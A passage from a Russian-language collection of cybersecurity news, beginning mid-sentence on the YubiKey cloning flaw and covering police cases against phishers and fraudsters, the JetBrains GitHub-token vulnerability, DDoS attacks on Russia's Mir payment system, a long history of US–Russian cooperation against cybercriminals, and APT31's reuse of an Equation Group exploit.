пользователя, включая требование ввода PIN-кода или сканирования отпечатков
пальцев или лица. Чтобы атака клонирования сработала против YubiKeys с
использованием этих дополнительных мер, злоумышленнику необходимо также
обладать фактором проверки пользователя.
Ключевой вопрос, который на данный момент остается без ответа, - какие еще устройства безопасности опираются на три уязвимых защищенных модуля Infineon и используют криптобиблиотеку Infineon?
статья: https://www.wired.com/story/yubikey-vulnerability-cloning/
Киберполицейские Прикарпатья разоблачили четырех жителей Ивано-Франковской области, которые взламывали учетные записи пользователей одной из соцсетей. Получив полный доступ к профилям, злоумышленники рассылали сообщение о займе денег от имени владельцев. Досудебное расследование завершено. Обвиняемым грозит до 15-ти лет лишения свободы.
Аферистов разоблачили киберполицейские Ивано-Франковской области совместно со следователями Ивано-Франковского РУП ГУНП в области под процессуальным руководством окружной прокуратуры города Ивано-Франковска.
Установлено, что схему организовали трое жителей Запорожской области и один житель Прикарпатья в возрасте от 20 до 27 лет. Они действовали на территории Ивано-Франковской области с августа 2023 по январь 2024 гг.
Злоумышленники рассылали сообщения в социальных сетях с просьбой осуществить голосование, перейдя по фишинговой ссылке. На указанном вебресурсе предлагалось авторизоваться, вследствие чего логины и пароли для входа в соцсети пользователей попадали в руки фигурантов. В дальнейшем, получив доступ к аккаунтам потерпевших, мошенники рассылали сообщения друзьям владельцев взломанных страниц с просьбой одолжить деньги.
Для перевода средств аферисты указывали номера подконтрольных банковских счетов. Таким образом фигуранты обманули полсотни человек. Полученные преступным путем средства правонарушители тратили на собственные нужды.
По месту жительства фигурантов полицейские провели ряд обысков. Изъята компьютерная техника, 16 мобильных телефонов, 16 банковских карт, наличные средства в сумме 1500 долларов и 86 тыс. грн, черновые записи и другие вещественные доказательства, указывающие на причастность лиц к противоправным действиям. По ходатайству правоохранителей на изъятое имущество был наложен арест.
Следователи объявили подозрение фигурантам по ч. 5 ст. 190 (Мошенничество), ч. 3 ст. 28 ч. 5 ст. 361 (Несанкционированное вмешательство в работу информационных, электронных коммуникационных, информационно-коммуникационных систем, электронных коммуникационных сетей), ч. 3 ст. 209 (Легализация (отмывание) имущества, полученного преступным путем Уголовного кодекса Украины.
Сейчас досудебное расследование завершено. Материалы уголовного производства вместе с обвинительным актом направлены в суд для рассмотрения дела по существу. Обвиняемым грозит до пятнадцати лет лишения свободы.
• Source: https://ifr.gp[.]gov.ua/ua/news.html?_m=publications&_c=view&_t=rec&id=364305
Компания JetBrains призывает пользователей обновить свои интегрированные среды разработки IntelliJ IDEA для устранения критической уязвимости, связанной с доступом к токенам GitHub.
Уязвимость CVE-2024-37051 затрагивает все IDE на базе IntelliJ, начиная с версии 2023.1, если включён и используется плагин JetBrains GitHub. 29 мая 2024 года была получена внешняя информация о потенциальной угрозе, влияющей на Pull Request в IDE.
Илья Плескунин, руководитель группы поддержки безопасности JetBrains, сообщил: «Злонамеренное содержание в Pull Request к проекту GitHub, обрабатываемое IDE на базе IntelliJ, может привести к утечке токенов доступа на сторонний хост».
JetBrains выпустила обновления безопасности для всех затронутых версий IDE (2023.1 и новее). Также обновлён и удалён из официального магазина уязвимый плагин JetBrains GitHub.
Полный список исправленных версий IDE на базе IntelliJ включает:
Плескунин настоятельно рекомендует обновиться до последних версий. Более того, для минимизации воздействия JetBrains также связалась с GitHub. В связи с принятыми мерами безопасности в старых версиях IDE плагин отныне может работать некорректно.
JetBrains настоятельно советует пользователям, активно использовавшим функциональность GitHub Pull Request в IntelliJ IDE, отозвать все GitHub- токены, используемые уязвимым плагином. Это поможет предотвратить доступ злоумышленников к связанным аккаунтам GitHub, даже при включенной двухфакторной аутентификации.
При использовании OAuth интеграции или Personal Access Token (PAT), также следует отозвать доступ для приложения JetBrains IDE Integration и удалить токен интеграции плагина IntelliJ IDEA GitHub.
Плескунин пояснил: «После отзыва токена потребуется заново настроить плагин, так как все его функции, включая Git-операции, перестанут работать».
В феврале JetBrains также предупреждала пользователей о критической уязвимости обхода аутентификации, которая позволяла злоумышленникам получить права администратора и взять под контроль уязвимые серверы TeamCity On-Premises. А чуть позже компания даже стала фигурантом скандала, связанного с весьма спорной политикой раскрытия уязвимостей.
Установлено, что фигуранты присвоили более 200 тысяч гривен заведения. Для этого они использовали систему купонов, введенную для клиентов ресторана и осуществляли несанкционированные вмешательства в работу электронной программы учета.
Злоумышленников, 38-летнего жителя Львовского района и львовянку в возрасте 23 лет, разоблачили следственные отделения расследования преступлений в сфере хозяйственной и служебной деятельности следственного отдела Львовского районного управления полиции № 1 совместно с оперативниками Управления противодействия киберпреступлениям во Львовской области, под процессуальным руководством Галицкой окружной прокуратуры.
Правоохранители задокументировали несколько фактов незаконного присвоения злоумышленниками средств на общую сумму более 200 тысяч гривен.
Следователи сообщили им о подозрении в совершении уголовных правонарушений, предусмотренных ч.3 ст.190 (Мошенничество) Уголовного кодекса Украины и ч.1 ст.361 (Несанкционированное вмешательство в работу информационных (автоматизированных), электронных коммуникационных, информационно- коммуникационных систем, электронных коммуникационных сетей) Уголовного кодекса Украины.
Максимальное наказание, которое грозит подозреваемым - лишение свободы на срок до пяти лет.
Досудебное расследование продолжается.
Украинские хактивисты провели масштабную DDoS-атаку на платежную систему МИР.
Целью атаки стал возможный сбой в обслуживании карт на фоне сообщений об
отказе ряда стран работать с платежной системой России. По данным издания,
хакеры генерируют трафик в нужное русло через браузеры или примитивные DDoS-
инструменты. В результате пользователи испытывают перебои в прохождении
платежей и работе терминалов.
Хакеры пытаются перегрузить платежную систему, чтобы вызвать сбой в обслуживании карт и прохождении платежей, поясняют специалисты. Они, в частности, генерируют трафик на системы, используя браузеры и примитивные DDoS-инструменты. Кроме того, такие атаки еще и являются способом поиска уязвимостей. Если хакеры их обнаружат, то в дальнейшем могут использовать для масштабных утечек данных.
«В текущей ситуации можно ожидать, что злоумышленникам удастся добиться
определенного успеха в DDoS-атаках на платежную систему "Мир", риски более чем
реальны», — отметил собеседник газеты в одной из профильных компаний. Атака,
по его словам, может привести к полному отказу эквайринга карт
продолжительностью до нескольких часов. Гендиректор Qrator Labs Александр
Лямин также напомнил изданию, что хакерам удавалось успешно атаковать
платежные системы, в частности, Visa и MasterCard в 2010 году.
На этой неделе управление по контролю за зарубежными активами Минфина США
(OFAC) 15 сентября выпустило предупреждение для иностранных финансовых
организаций о рисках сотрудничества с российской платежной системой «Мир». В
американском ведомстве подчеркнули, что если Вашингтон увидит в этом
сотрудничестве помощь России в обходе введенных против нее санкций, он
оставляет за собой право ввести блокирующие санкции.
Источники на рынке кибербезопасности подтвердили факт такой кибератаки, в Банке России по этому поводу не ответили, в НСПК отказались комментировать эту информацию, а в Минцифры РФ уточнил, что этот вопрос в компетенции Национального координационного центра по компьютерным инцидентам и ЦБ.
Тема рэнсома сейчас очень актуальна. И это понятно. Американские корпорации теряют деньги, которые уходят в виде крипты в страны СНГ, но деньги — это не главное. С деньгами уходят данные. А это куда важнее. Современные пэйлоады рэнсома способны самостоятельно развить атаку на домен с обычной рабочей станции и рэнсомщики не скрывают того, что предлагают деньги за то, что сотрудник компании запустит лишь один бинарник у себя на компе.
Сегодня США громко заявляет о том, что Россия не способна бороться с киберпреступностью, в частности с вымогателями. Жертвами закулисных интриг о которых в РФ теперь даже бояться заикнуться стал уже не один человек. И если политическая линия в отношении киберпреступлений в США была достаточно ясна, то в России уже никто не знает чего ждать от властей и кого «сольют» дальше, чтобы сохранить в тайне свои секреты Полишенеля. Сливают не тех кого требуют, а тех, кого выгодно, больше, для того, чтобы показать, что хоть какая то борьба да идёт. В общем, бей своих, чтобы чужие боялись.
Но были времена, когда эти два государства помогали друг другу в поимке киберпреступников и успешно сотрудничали. Известная американская журналистка и писательница Ким Зеттер написала интересный материал про самые громкие киберпреступления и то, как Россия и США совместно эти преступления раскрывали. В этой статье вы узнаете всех персонажей в лицо. Истории не новые, но отличаются интересными ранее не известными деталями и фактами, которые откопала Зеттер. Тем не менее, в переводе на русский у Зеттер не все складывается и я решил переписать длинную историю на свой лад.
Давайте вспомним?
Июль, 1994 год. ФБР узнает о первом в мире онлайн ограблении банка.
Владимир Левин, 30-летний системный администратор петербургской компании- разработчика программного обеспечения, получил доступ к системе управления денежными средствами Ситибанка, которая переводит деньги по всему миру. В течение многих месяцев Левин и его подельники инициировали около 40 банковских переводов почти на 11 миллионов долларов со счетов клиентов Ситибанка на банковские счета, контролируемые сообщниками в Финляндии, Германии, Израиле, Нидерландах и США.
Власти заморозили принимающие счета после того, как исчезли первые 400 000 долларов, и арестовали некоторых сообщников Левина, которые пытались вывести средства из банков Сан-Франциско и других мест. Но как ФБР заполучить Левина, который проживал в России?
Прошло три года после распада Советского Союза, и США и Российская Федерация недавно подписали историческое соглашение о сотрудничестве, позволяющее координировать уголовные и террористические расследования. Но между двумя странами не было соглашения об экстрадиции, а конституция России запрещала властям отправлять российских граждан в другие страны для судебного преследования.
Так что ФБР тянуло время для сбора доказательств, и в марте 1995 года агенты получилиудачныймомент. Левин проехал через Лондон по пути на компьютерную ярмарку в Роттердаме, и Скотланд-Ярд схватил его в аэропорту от имени США. Левин был экстрадирован в Нью-Йорк, где он признал себя виновным и был приговорен к трем годам тюремного заключения.
СМИ наперебой заговорили, что бюро заманило Левина в Лондон, чтобы произвести арест. Но Стивен Гарфинкель, бывший агент ФБР в Нью-Йорке, который занимался этим делом, рассказал Zero Day, что российская полиция фактически проинформировала ФБР о планах поездки Левина. И на самом деле российские власти помогли ФБР с обоснованными обвинениями против Левина и оказали всяческое сотрудничество, которое сегодня кажется немыслимым.
«Российская полиция конфисковала целую кучу компьютеров использованных для совершения преступлений. Мы пошли туда и сфотографировали один… и нашли улики, практически по горячим следам», — говорит Гарфинкель. «Эти улики были своего рода ключом ко всему делу».
Помощь со стороны бывшего советского блока была чрезвычайно полезной. Я помню, как проходили допросы. В здании были двери высотой около 12 футов, одна вращающаяся 40-ваттная лампочка и пара стульев в комнате для допросов», — вспоминает Гарфинкель. «Двери распахиваются, и двое головорезов бросают информатора внутрь, и как самолет он приземлился перед нами».
В этом году после беспрецедентных атак программ-вымогателей на критически важную инфраструктуру, которые угрожали общественной и национальной безопасности, США обвинили Россию в том, что она позволяет, если не направляет, и использует киберпреступность в качестве инструмента государственного давления. Президент Байден призвал Путина обуздать преступные группировки, стоящие за операциями. Но киберпреступления с программами- вымогателями, связанными с российскими группировками, продолжаются, и официальные лица правительства США выражают сомнение в том, что Россия когда- либо предпримет конкретные шаги, чтобы остановить их. Так, например, как не предприняли никаких усилий для ареста Евгения Полянина, 28-летний россиянина, разыскиваемого ФБР по обвинению в проведении атак с использованием программ- вымогателей в связи с бандой вымогателей REvil / Sodinokibi.
Издание Daily Mail недавно выследила Полянина до дома стоимостью 380 000 долларов в Сибири, где он, по всей видимости, живет. И где, его абсолютно не трогает российская полиция.
Сейчас российско-американские отношения настолько низкие, что трудно вспомнить, как когда-то две страны тесно сотрудничали в отслеживании киберпреступников, а российские власти даже предоставили США важные доказательства, чтобы помочь осудить российских граждан.
«Давайте вспомним Лунный Лабиринт в конце 90-х ( это масштабное расследование преступлений и нарушений в сети военных и правительственных сил США, ведущее к России), это было время, когда делегации правоохранительных органов США приезжали в Россию в самые лучшие времена и мы все были собутыльниками. Люди хотели помочь друг другу», — говорит Дмитрий Альперович, соучредитель российского происхождения и бывший технический директор американской фирмы CrowdStrike, занимающейся компьютерной безопасностью.
«Однако с годами сотрудничество изменилось под влиянием политических ветров, и ему часто мешала коррупция в российских ведомствах. И поскольку русских хакеров все чаще вербовали или принуждали к проведению операций для правительства, российская полиция оказалась перед дилеммой. Проблема заключалась не только в том, что мы просили Россию о помощи, которую они становились все менее и менее заинтересованными в предоставлении, но мы также начали спрашивать о хакерах, которые работали с российской разведкой », — говорит Альперович, ныне основатель Silverado Policy Accelerator и Институт Альперовича по исследованиям кибербезопасности при Университете Джона Хопкинса.
ФБР в Москве
В июле 1994 года директор ФБР Луи Фри после распада Советского Союза нанес исторический визит в Москву для подписания соглашения о сотрудничестве с министром внутренних дел России Виктором Ериным. Соглашение было направлено в первую очередь на борьбу с российской организованной преступностью, «новым транснациональным противником», который, по словам Фри, представлял растущую угрозу национальной безопасности США.
Соглашение формально установило канал для сотрудничества российской полиции и ФБР в расследованиях через юридического атташе ФБР (LEGAT), который будет размещен в посольстве США в Москве. Соглашение также открыло для российской полиции возможность пройти обучение в академии ФБР США. Примечательно, что при подписании документа Фри показал, что идея сотрудничества на самом деле исходила от Ерина, который предложил его двумя годами ранее.
У ФБР уже было около двух десятков юридических атташе по всему миру для облегчения сотрудничества между агентами ФБР и их иностранными коллегами по международным уголовным делам и делам о терроризме; Фри надеялся, что юридический атташе в Москве станет первым шагом на пути к подписанию российско-американского договора об экстрадиции. Этого не произошло. Но две страны подписали договор о взаимной правовой помощи (MLAT) в 1999 году, который вступил в силу в 2002 году. Он создал основу для обмена доказательствами и информацией, имеющими отношение к расследованиям, и подачи запросов на допрос свидетелей, проведения обысков, а также задержания проведения допросов или арестов подозреваемых.
Через два месяца после того, как Фри подписал соглашение о сотрудничестве от 1994 года, в Москву прибыли два агента ФБР — Майкл ди Преторо и Уильям Кинан, которые выполняли функции юридических атташе. У них уже было около 35 просьб о помощи, ожидающих их решения.
«Наш нью-йоркский офис проделал обширную работу по борьбе с организованной преступностью в России, и у нас было много запросов к россиянам», — рассказывает Кинан Zero Day.
У них были некоторые начальные проблемы. В посольстве США еще не было офисных помещений для атташе, и Кинану пришлось несколько месяцев жить в отеле, пока не стали доступны апартаменты в посольстве. И их главные связные в России — министр внутренних дел Виктор Ерин и глава отдела по борьбе с организованной преступностью Михаил Константинович Егоров — вскоре были уволены с работы после неудачного противостояния с чеченскими боевиками, в результате которого погибло большинство заложников.
Примерно через три месяца после прибытия в Москву Кинану позвонили из ФСБ России и спросили, почему он не связался с ними, чтобы договориться о встрече. Спецслужба ФСБ была преемницей КГБ.
Соглашение о сотрудничестве между США и Фри подписано только с Министерством внутренних дел (МВД) России, которое осуществляет надзор за российской полицией. Так как Фри избегал заключения каких-либо официальных соглашений с ФСБ из-за своей шпионской роли и темной истории КГБ. Но Кинан и его коллеги согласились встретиться с представителями ФСБ в знаменитом штабе КГБ на Лубянке, где в недалеком прошлом допрашивали и пытали политических диссидентов. Эта встреча превратилась в еженедельную встречу с ФСБ. По словам Кинане, там, где работа с российской полицией была совместной, ФСБ просто хотела выжать из ФБР информацию о своих расследованиях.
Товарищи по оружию
Одним из первых серьезных дел, вытекающих из соглашения о сотрудничестве с Российской Федерацией, стало судебное преследование США Вячеслава Иванькова, предполагаемого главы ячейки русской мафии в Бруклине, штат Нью-Йорк, в 1995 году.
«Русские прослушивали всех известных «злодеев» в своей стране. У них также была информация о телефонных разговорах между «злодеями» и их заговорщиками в США, которая была передана ФБР в США, чтобы помочь построить дело против них, — говорит Кинан. Но Иванков отрицал, что возглавлял банду русской мафии в США, и вместо этого утверждал, что российские враги использовали ФБР, чтобы свести с ним счеты.
ФБР, в свою очередь, помогло россиянам возбудить крупное дело о международной коррупции. Бывший Советский Союз был разграблен коррумпированными чиновниками и сообщниками, которые скрылись в США с деньгами, драгоценностями и ценными ресурсами, и ФБР помогло России раскрыть громкое дело, связанное с украденным золотом и драгоценными камнями на сумму 180 миллионов долларов, которые были отправлены в США. США. Это принесло ФБР большую пользу в России.
К 1998 году российские власти помогли с 660 следственными действиями в США, как сообщил законодателям на слушаниях в Конгрессе в том же году чиновник ФБР, число которых значительно увеличилось в течение следующего десятилетия. Агент ФБР Джим Трейси, который в период с 2007 по 2009 год занимал должность юридического атташе в Москве, в 2013 году сообщил Washington Post, что за время его пребывания в должности Россия и США ежегодно отправляли друг другу около 800 запросов о помощи в расследованиях финансовых преступлений, кибератак, детских порно, торговля людьми и терроризм. Но помощь была разной: обе стороны опасались обмениваться информацией, которая могла бы раскрыть разведывательные возможности.
Путин встречался с ФБР
Примерно в это же время, в 1998 году, Владимир Путин возглавил ФСБ примерно на год и начал без предупреждения приходить на еженедельные встречи Кинан и его команды с ФСБ. Путин молча наблюдал за происходящим.
«Я думаю, ему просто не верилось, что на Лубянке сидит агент ФБР», — вспоминает Кинан.
Возможно, не случайно, в это же время, ФБР начало расследование Лунного лабиринта — кодового названия ФБР серии вторжений, которые в конечном итоге были приписаны российскому правительству в одной из первых раскрытых широко распространенных хакерских операций национального государства. Первоначально не было ясно, что за операциями стоит российское правительство, и Кинан говорит, что какое-то время российская полиция стремилась помочь в отслеживании преступников, чьи IP-адреса были в России.
«Я был поражен тем, что Министерство внутренних дел помогло нам решить эту проблему, — говорит он. — Но они проделали большую работу и сосредоточились на некоторых группах, которые были прикрытием ФСБ. И, наконец, в конце концов они сказали мне: «Мы больше ничего не можем для тебя сделать», -вспоминает агент Кинан.
**Рост организованной киберпреступности.
Известные имена кардерского мира**
В начале августа произошел взрыв электронной коммерции и киберпреступности в Восточной Европе. Дело Левина доказало, что взлом компьютеров может быть прибыльным, и российские хакеры считали себя неприкасаемыми до тех пор, пока не нацеливались на жертв в России.
Грег Крэбб был следователем Почтовой службы США с 2000 по 2007 год и занимался отслеживанием организованной киберпреступности в Европе, в частности, так называемых «кардинговых» группировок, которые стояли за серией взломов TJX, Office Max и Dave & Busters, в которых участвовали кража миллионов номеров кредитных и дебетовых карт. Крэбб был заинтересован в сотрудничестве в отслеживании преступников на территории России. Но вместо того, чтобы обратиться к юридическому атташе ФБР в Москве, он обратился к сотруднику ФСБ в российском посольстве в Вашингтоне, округ Колумбия.
«Мой путь был, может быть, не самым обычным. Я позвонил в российское посольство и попросил к телефну связного ФСБ Бориса Соколова. Я встречался с ним несколько раз, и он согласился, что имеющейся у меня информации о преступлениях, происходящих в России, достаточно, чтобы встретиться с его коллегами в Москве», — говорит Крэбб. Он считает, что именно то обстоятельство, что он работал на Почтовую службу США, а не в агентстве с разведывательным отделом — например, ФБР, — заставило ФСБ работать с ним более охотно, чем с бюро.
Именно через ФСБ Крэбб узнал о CarderPlanet, подпольном торговом центре кардинга, созданном российскими и украинскими киберпреступниками. Весной 2001 года более сотни восточноевропейских преступников собрались в одесском ресторане на то, что они назвали «Международной конференцией кардеров», и CarderPlanet стала продуктом этой встречи.
CarderPlanet, форум, доступный только по приглашениям, на пике своего развития насчитывал более 7000 участников по всему миру и был образцом для всех последующих форумов, посвященных криминальному хакерству, включая современные сайты. Существовали частные чаты для планирования преступных заговоров и торговые площадки для торговли хакерскими инструментами и номерами украденных карт. Были также практические руководства по выбиванию пустых карточек с украденными номерами, хакерские услуги поставщиков, а также обзоры продуктов и продавцов для оценки надежности украденных товаров и поставщиков. Изначально только для русскоязычных, CarderPlanet позже добавила англоязычный форум, чтобы сопоставить русских хакеров с людьми в США и Великобритании, которые могли обналичивать деньги с ворованных карт, а затем отправлять деньги россиянам через Web Money и службу цифровой валюты, известную как eGold.
В ходе своей работы у Крэбба сложились особенно хорошие отношения с Сергеем Михайловым, тогдашним заместителем руководителя Центра информационной безопасности ФСБ, который оказался «отличным коллегой по расследованию».
Михайлов дал Крэббу фотогрфию, которые участники одесской кардеров сделали на своей инаугурационной встрече, а также копию базы данных CarderPlanet. Последний предоставил критически важную информацию о преступлениях и преступниках, за которыми следил Крабб, спустя много времени после закрытия CarderPlanet в 2004 году. Тем не менее, в странном повороте, который подчеркивает опасную линию, по которой российские правоохранительные органы идут на помощь США, сам Михайлов был арестован в декабре 2016 года. За якобы передачу секретной информации ФБР по другому делу.
Михайлов и Руслан Стоянов, сотрудник российской компании по кибербезопасности «Лаборатория Касперского», были обвинены в 2016 году в предоставлении ФБР информации о Павле Врублевском, основателе российской цифровой платежной системы ChronoPay. Михайлов ранее помогал осудить Врублевского по российскому уголовному делу, и Врублевский, как сообщается, поклялся отомстить. Михайлову и Стоянову было предъявлено обвинение в государственной измене за предложение продать ФБР базу данных ChronoPay за 10 миллионов долларов, Михайлов был приговорен к 22 годам лишения свободы, а Стоянов был приговорен к 16 годам заключения. Михайлов тесно общался с другим Российским бизнесменом, Павлом Врублевским, который позже выступил против него в суде свидетелем.
Если бы Крэбб имел большой успех в работе с ФСБ над CarderPlanet,то дело с участием украинского кардера выявило проблемы, с которыми правоохранительные органы США столкнутся при вынесении приговора в Восточной Европе, даже когда тамошние власти были готовы арестовать подозреваемых.
Среди основателей торгового центра CarderPlanet был 22-летний украинец по имени Дмитрий Иванович Голубов, которого считали одним из крестных отцов восточноевропейского кардинга, который начинал свою карьеру спамера до того, как переключился на более прибыльную индустрию воровства банковских карт.
Голубов был громкой целью, которую в течение многих лет разыскивали Секретная служба, ФБР и USPS. Крабб трижды приезжал в Украину, начиная с ноября 2003 года, но украинские власти были равнодушны к аресту Голубова — до Оранжевой революции 2004 года.
После смены правительства Управление по борьбе с организованной преступностью Министерства внутренних дел Украины через посольство США направило Крэббу сообщение с приглашением вернуться в Киев, чтобы представить свои доказательства против Голубова. Спустя две недели Голубова задержала украинская полиция. Но шесть месяцев спустя он был освобожден под залог, и дело развалилось, когда два украинских политика заступились за него и предотвратили использование критических улик против него в суде. Впоследствии Голубов сам стал политиком, получив назначенное место в украинском парламенте в качестве члена Интернет-партии — должность, которая давала ему иммунитет от судебного преследования.
Прилетай в рай – мы тебя арестуем
Если дело Голубова чему-то и научило Крэбба и других сотрудников правоохранительных органов США, так это тому, что единственный надежный путь к правосудию — это преследование киберпреступников из Восточной Европы в судах США. Но для этого им придется задерживать преступников за пределами своей страны. К счастью для таких агентов, как Крэбб, российские киберпреступники уже давно неравнодушны к солнечному климату — особенно в течение долгих зим в России — и их предпочтительный климат часто находится в странах, имеющих соглашения об экстрадиции с США. Именно так Крэббу удалось захватить 28-летнего Максима Ковальчука, когда он путешествовал со своей женой в Таиланде в мае 2003 года. Власти арестовали его в бангкокском магазине мороженого всего за несколько часов до того, как он должен был сесть на рейс домой.
«Вместе с Ковальчуком мы изучили средства правовой защиты, которые у нас были бы, если бы мы обратились к украинцам… чтобы арестовать Ковальчука на территории Украины, это врядли привело бы к результатам, которых мы надеялись достичь», — говорит Крэбб.
Ковальчук, который продавал пиратское программное обеспечение через eBay и совершал мошенничество с кредитными картами, взломал сервер, принадлежащий Hurricane Electric, интернет-провайдеру во Фремонте, Калифорния, и использовал его в качестве прокси для отправки электронной почты жертвам мошенничества и преступным группам. Преступники с CarderPlanet убедил его в важности скрыть его личность и местонахождение, поэтому Ковальчук решил, что лучший способ защитить себя — использовать прокси-сервер в США для отправки своей корреспонденции. В то время кардинговое сообщество считало, что правоохранительные органы США не обладают навыками или смекалкой, чтобы их отслеживать.
«Я думаю, он понятия не имел, что файл журнала создавался для каждого сообщения, которое он отправлял», — сказал Крабб Zero Day. «Вероятно, 40 000 электронных писем за несколько лет» находились на сервере Hurricane Electric.
Крэбб получил доступ к сохраненным сообщениям и журналам, которые показали IP- адрес Ковальчука в Украине, а также раскрыли его планы на отпуск с женой в Таиланде — Ковальчук забронировал номер в отеле по электронной почте. Он и его жена в конце концов отменили поездку из-за паники атипичной пневмонии. Но год спустя, когда каникулы возобновились, и Крэбб обратился к властям Таиланда. Полиция Таиланда пошла навстречу, но на обработку запроса через посольство США и министерство иностранных дел Таиланда потребовались недели бюрократии.
«Мы думали, что просто попросим и они арестуют его, как только он ступит на их землю», — говорит Крэбб.
Ковальчук находился в Таиланде две недели, и «буквально осталось несколько часов до того, как он собирался улетать обратно в Украину, и наконец Крэббу разрешили арест. Он мог сопровождать тайскую полицию при задержании, и он сел рядом с Ковальчуком по дороге в полицейский участок. По словам Крэбба, он, похоже, не осознавал серьезности ситуации, но был впечатлен тем, что правоохранительные органы США объехали весь мир, чтобы схватить его.
«Он думал, что он Фрэнк Абигнейл», — говорит Крэбб, имея в виду известного беглеца.
С тех пор, при полном отсутствии сотрудничества с Россией, многие другие российские киберпреступники были схвачены во время своих путешествий в Таиланд, Кипр, Доминиканскую Республику и другие солнечные места, где у США есть соглашения об экстрадиции, а иногда даже туда, где они этого не делают. т. В 2014 году США задержали сына российского депутата на Мальдивах, несмотря на отсутствие соглашения об экстрадиции. Мальдивские власти арестовали Романа Селезнева в аэропорту Мальдив, когда он и его супруга собирались вылететь в Россию, и согласились передать его США. Россия, в свою очередь, назвала арест и экстрадицию Селезнева похищением.
Чей Крым и Сноуден?
Трудно определить, когда именно с годами сотрудничество с Россией в борьбе с хакерами и другими киберпреступниками пошло на убыль. Эксперты говорят, что это никогда не было чем-то особенно сильным или надежным. Но наибольшие неудачи в сотрудничестве, вероятно, возникли после того, как Путин стал президентом в 2012 году и произошел ряд событий.
Ближе к концу 2012 года Конгресс принял Закон Магнитского в ответ на смерть в тюрьме в 2009 году российского налогового юриста Сергея Магнитского, который был заключен в тюрьму после расследования российских налоговых органов по обвинению в мошенничестве. Законопроект был направлен на наказание россиян, признанных виновными в смерти Магнитского, хотя в более широком плане он позволяет США замораживать активы любых иностранных нарушителей прав человека, налагать против них санкции и запрещать им получать визы для посещения США в ответ на Закон Магнитского. Россия внесла 18 американцев в свой список о замораживании активов и запрете на выдачу виз.
Отношения с Россией еще более осложнились несколько месяцев спустя, когда весной 2013 года Россия предоставила убежище руководителю АНБ Эдварду Сноудену, что побудило президента Барака Обаму отменить личный саммит по безопасности с Путиным в Москве. Затем в 2014 году Россия аннексировала Крымский полуостров — шаг, широко осуждаемый по всему миру. А в 2016 году были опубликованы Панамские документы — Путин обвинил правительство США в утечке документов, раскрывающих финансовые дела его ближайшего окружения. Вскоре после этого российские спецслужбы, взломавшие Национальный комитет Демократической партии, начали утечку электронных писем и документов, изъятых в результате этого взлома, и впоследствии предприняли многочисленные попытки взломать избирательную инфраструктуру США и вмешаться в президентские выборы 2016 года, тем самым резко уронив американо-российские отношения до нового самого низкого уровня.
Люк Дембоски, бывший заместитель помощника генерального прокурора по национальной безопасности в Министерстве юстиции, который руководил реагированием департамента на многие громкие расследования киберинцидентов, отмечает, что любое снижение сотрудничества, которое могло произойти за эти годы, не было линейным или легким. отслеживается до определенного события. По его словам, были времена, когда сотрудничество в политически напряженные времена фактически увеличивалось — он приводит сотрудничество в связи с Олимпийскими играми в Сочи в 2014 году в качестве одного из примеров сотрудничества США и России в борьбе с киберугрозами и угрозами национальной безопасности, которые возникли, несмотря на политические трудности.
«Необходимо было работать вместе над определенными типами угроз в интересах каждой страны, поэтому было легче найти точки соприкосновения », — говорит Дембоски.
А в 2013 году, в разгар напряженности ситуации, Дембоски помогал заключить историческое киберсоглашение между Россией и США об обмене информацией о киберугрозах и создании прямой и безопасной линии связи между Белым домом и Кремлем.
Однако неясно, способствовало ли когда-либо соглашение расследованию киберпреступлений.
«Это было прямо перед аннексией Крымского полуострова, что очевидно, значительно испортило отношения двух стран», — говорит Дембоски, подчеркивая проблемы налаживания сотрудничества в постоянно меняющихся и политически заряженных обстоятельствах.
Как бы там ни было, при существующем порядке вещей, отношения между двумя державами в ближайшее время навряд ли достигнут уровня партнерства. Но если от США вполне понятно то, чего можно ожидать, то как поведёт себя Россия предсказать очень сложно. Равно как ты, кто станет следующем, брошенным не под один, а под целых два локомотива великих супердержав.
И да, любители глобализма и международного сотрудничества, в том чилсе, Михайлов и Сачков, арестованы. И навряд ли выйдут в ближайшее время…
А вот она и тайна. Неужели оно того стоит? ОНО ТОГО СТОИТ?
И это еще не все… Мир разделился на «своих» и «чужих».
Берегите себя, парни. Мир изменился.
• Source: cybersec.org/people/rossiya-ssha-i-kiberzhuliki-chto-budet- dalshe.html
В Воронежской области 30-летнего хакера осудили за создание вредоносной программы по взлому электронных кошельков, сообщили в пресс-службе управления ФСБ по региону.
В октябре 2018 г. мужчина создал компьютерную программу для несанкционированной модификации банковских реквизитов получателей электронных переводов. После этого он продавал свою разработку на одном из «хакерских» форумов по цене от 800 до 1200 руб. Сотрудники УФСБ задержали предпринимателя с поличным в июне 2019 г. при проведении «проверочной закупки».
Доказать удалось семь нелегальных сделок. Уголовные дела возбудили по ч. 1 ст. 273 УК РФ (создание, распространение компьютерной программы, заведомо предназначенной для несанкционированной модификации и блокирования компьютерной информации) и ч. 2 ст. 273 УК РФ (создание, распространение компьютерных программ, заведомо предназначенных для несанкционированной модификации и блокирования компьютерной информации, совершенное из корыстной заинтересованности).
Служители Фемиды назначили обвиняемому наказание в виде трех лет лишения свободы условно с испытательным сроком в 2,5 года. Приговор может быть обжалован в течение десяти суток.
В 2017 году группировка The Shadow Brokers похитила хакерский инструментарий АНБ и долгое время пыталась продать его. Затем, когда покупателей не нашлось, хакеры опубликовали большую часть дампа бесплатно, в открытом доступе. Многие читатели наверняка помнят, что тогда, в числе прочего, эксплоиты ETERNALBLUE и DOUBLEPULSAR стали достояние общественности и были использованы для атак на уязвимость в SMB для распространения известного вымогателя WannaCry.
Теперь же исследователи компании Check Point заметили, что китайская хак- группа APT31 (она же Zirconium) использовала эксплоит для Windows-уязвимости CVE-2017-2005 за три года до того момента, как The Shadow Brokers «слила» этот инструмент в открытый доступ, вместе с другими эксплоитами и данными, похищенными у АНБ.
Эксплоит китайских хакеров, о котором идет речь, носит имя Jian. Он представляет собой копию эксплоита EpMe, который разработали и активно использовали с 2014 по 2017 год хакеры из Equation Group (чью деятельность эксперты давно связывают напрямую с АНБ). Когда The Shadow Brokers похитили данные и инструменты АНБ, а затем опубликовали все это в открытом доступе, EpMe тоже стал достоянием общественности. Однако в руки китайцев он попал намного раньше.
«К нашему удивлению, мы обнаружили, что эксплоит APT31 на самом деле представляет собой реконструированную версию эксплоита Equation Group под названием EpMe. А значит, эксплоит Equation Group использовался китайской группой, скорее всего, против целей в США», — пишут исследователи.
Click to expand...
Оба инструмента использовались для повышения привилегий в локальной среде Windows. Напомню, что Microsoft исправила уязвимость CVE-2017-0005, которой злоупотребляли Jian и EpMe, но лишь после того, как специалисты компании Lockheed Martin обнаружили работающий образец эксплоита и предоставили его экспертам Microsoft.

